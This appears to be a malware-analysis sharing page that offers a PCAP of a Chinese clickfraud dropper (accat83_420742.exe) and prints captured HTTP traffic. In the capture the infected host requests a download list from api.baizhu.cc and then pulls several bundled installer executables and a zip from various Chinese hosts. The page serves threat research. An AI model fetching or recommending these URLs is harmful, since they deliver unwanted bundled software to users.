
accat83_420742.exe zol.com.cn Unknown baizhu.cc Chinese Clickfraud Malware PCAP file download

Download Attachments

  • 1 pcap accat83
    Date added: October 26, 2016 5:32 am Added by: admin File size: 1 MB Downloads: 76

2016-10-25 22:50:26.808695 IP 192.168.1.102.60855 > 222.163.80.69.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /skycndownernew/accat83_420742.exe HTTP/1.1
E..ad.@……..f..PE…P=..0s%..P….,..GET /skycndownernew/accat83_420742.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down10.zol.com.cn
Connection: Keep-Alive

2016-10-25 22:50:38.567607 IP 192.168.1.102.60857 > 222.73.144.174.80: Flags [.], ack 3917, win 260, length 0
E..(-.@……..f.I…..P|.&…..P…^………

E..(7.@……..fx.m….P….c…P…~………
2016-10-25 22:50:41.309783 IP 192.168.1.102.60858 > 120.26.109.229.80: Flags [P.], seq 0:208, ack 1, win 256, length 208: HTTP: POST /api/getdown HTTP/1.1
E…7.@……..fx.m….P….c…P…….POST /api/getdown HTTP/1.1
Host: api.baizhu.cc
Content-Length: 16
Connection:close
Accept-Language: zh-cn
Cache-Conbtrol:no-cache
Content-Type:application/x-www-form-urlencoded

&appid=1&sid=360


E..(".@…A3…fh.l….P"….1[.P…3………
2016-10-25 22:50:42.378076 IP 192.168.1.102.60859 > 104.192.108.21.80: Flags [P.], seq 0:283, ack 1, win 64240, length 283: HTTP: GET /partner/Inst13__3112087__3f7372633d6c6d266c733d6e31343463316364383939__68616f2e3336302e636e__0c70.exe HTTP/1.1
E..C".@…@….fh.l….P"….1[.P…….GET /partner/Inst13__3112087__3f7372633d6c6d266c733d6e31343463316364383939__68616f2e3336302e636e__0c70.exe HTTP/1.1
Host: dl2.360safe.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache

2016-10-25 22:50:42.475635 IP 192.168.1.102.60859 > 104.192.108.21.80: Flags [F.], seq 283, ack 293, win 63948, length 0
E..(".@…A1…fh.l….P"….1].P…2p……..

E..(X.@…^….fy……P……..P………….
2016-10-25 22:50:43.183380 IP 192.168.1.102.60860 > 121.29.8.212.80: Flags [P.], seq 0:190, ack 1, win 256, length 190: HTTP: GET /baizhu.zip HTTP/1.1
E…X.@…]M…fy……P……..P…….GET /baizhu.zip HTTP/1.1
Host: cdn.baizhu.cc
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache

2016-10-25 22:50:51.890950 IP 192.168.1.102.60866 > 106.120.177.204.80: Flags [P.], seq 0:232, ack 1, win 256, length 232: HTTP: GET /hz/IQIYIsetup_qudao@kb096.exe HTTP/1.1
E…..@….g…fjx…..PN.. ..S.P…d…GET /hz/IQIYIsetup_qudao@kb096.exe HTTP/1.1
Host: dl.static.iqiyi.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache
Range: bytes=0-

2016-10-25 22:50:51.890966 IP 192.168.1.102.60865 > 123.125.112.215.80: Flags [P.], seq 0:236, ack 1, win 258, length 236: HTTP: GET /v1/t/full/p/mini/tn/10003908/ch_dl_url HTTP/1.1
E…(.@…#~…f{}p….P.3.k?C<.P…)A..GET /v1/t/full/p/mini/tn/10003908/ch_dl_url HTTP/1.1
Host: j.br.baidu.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache
Range: bytes=0-

2016-10-25 22:50:51.902666 IP 192.168.1.102.60863 > 104.192.108.18.80: Flags [.], ack 249953, win 64240, length 0

E..(-J@….)…f.o…..Pg0H…&vP…(………
2016-10-25 22:50:52.051207 IP 192.168.1.102.60868 > 171.111.154.222.80: Flags [P.], seq 0:216, ack 1, win 256, length 216: HTTP: GET /1haitao10023.exe HTTP/1.1
E…-K@….P…f.o…..Pg0H…&vP….a..GET /1haitao10023.exe HTTP/1.1
Host: 1tdl.1haitao.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
